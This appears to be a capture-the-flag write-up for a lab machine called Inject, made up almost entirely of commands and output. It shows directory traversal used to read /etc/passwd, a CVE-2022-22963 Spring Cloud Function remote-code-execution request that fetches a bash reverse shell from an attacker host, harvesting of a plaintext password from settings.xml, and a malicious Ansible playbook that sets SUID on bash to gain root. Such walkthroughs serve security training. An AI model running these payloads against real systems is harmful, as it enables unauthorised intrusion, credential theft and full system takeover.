Scanning

> TARGET=10.129.36.96 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enum

• Try to upload something via http://10.129.36.96:8080/show_image?img=
• This leads to another endpoint http://10.129.36.96:8080/show_image?img=<file-you-uploaded>
• The parameter img is vulnerable to LFI

> wfuzz -c -z file,/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://10.129.36.96:8080/show_image?img=FUZZ' --hw 16
> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

• Enum webapp path

> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/index.html'          
{"timestamp":"2023-03-12T20:31:50.737+00:00","status":500,"error":"Internal Server Error","message":"URL [file:/var/www/WebApp/src/main/uploads/../../../../../../../../../../var/www/html/index.html] cannot be resolved in the file system for checking its content length","path":"/show_image"}

# found two users
> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash

# directory listing also works
> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/www/WebApp/'    
.classpath
.DS_Store
.idea
.project
.settings
HELP.md
mvnw
mvnw.cmd
pom.xml
src
target

• check pom.xml, note org.springframework.cloud

<dependency>
        <groupId>org.springframework.cloud</groupId>
        <artifactId>spring-cloud-function-web</artifactId>
        <version>3.2.2</version>
</dependency>

• Leads to https://github.com/me2nuk/CVE-2022-22963

Foothold: CVE-2022-22963

• Target is vulnerable to https://github.com/me2nuk/CVE-2022-22963

# s.sh file
#!/bin/bash
bash -i >& /dev/tcp/<attacker>/4444 0>&1

# upload shell
> curl 'http://10.129.36.96:8080/functionRouter' -X POST -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://<attacker>/s.sh -O /tmp/s.sh")' --data-raw 'data' -v

# execute shell
> curl 'http://10.129.36.96:8080/functionRouter' -X POST -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /tmp/s.sh")' --data-raw 'data' -v

PE: phil

• Upload linpeas

[+] Searching root files in home dirs (limit 30)
/home/
/home/phil/.bash_history
/home/frank/.bash_history
/home/frank/.m2/settings.xml
/root/

• Found the user phil’s credential

frank@inject:~$ cat /home/frank/.m2/settings.xml
cat /home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

• su to phil

frank@inject:~$ su phil
su phil
Password: DocPhillovestoInject123
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
bash -i
bash: cannot set terminal process group (817): Inappropriate ioctl for device
bash: no job control in this shell
phil@inject:/home/frank$ cd
cd
phil@inject:~$ ls
ls
user.txt
phil@inject:~$ cat user.txt
cat user.txt
4f6415fec7f2b19cadf30c0a76365370

PE: root

• Run linpeas, /opt/automation/tasks/playbook_1.yml

[+] Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_frank/817
/opt/automation/tasks/playbook_1.yml
/var/log/syslog
/var/log/journal/85d739f40e3d4536ad871c536347b52b/user-1001.journal
/var/log/journal/85d739f40e3d4536ad871c536347b52b/system.journal
/var/log/auth.log
/home/phil/.gnupg/pubring.kbx
/home/phil/.gnupg/crls.d/DIR.txt
/home/phil/.gnupg/trustdb.gpg

• This is running ansible playbook: https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/
• create a playbook for pe, mmm.yml

- name: "mmm"
  hosts: localhost
  connection: local
  tasks:
    - name: "mmm"
      shell: "chmod +s /bin/bash"
      register: "output"

• Upload to target the wait for pe to execute

phil@inject:~$ wget http://<ip>/mmm.yml -O /opt/automation/tasks/mmm.yml
--2023-03-12 21:58:08--  http://<ip>/mmm.yml
Connecting to <ip>:80... connected.
HTTP request sent, awaiting response... 200 OK

phil@inject:~$ ls -ls /usr/bin/bash
1156 -rwsr-sr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash

phil@inject:~$ /usr/bin/bash -p
id
uid=1001(phil) gid=1001(phil) euid=0(root) egid=0(root) groups=0(root),50(staff),1001(phil)

cat /root/root.txt
0fcd38b750f447d389e330edc4e2595a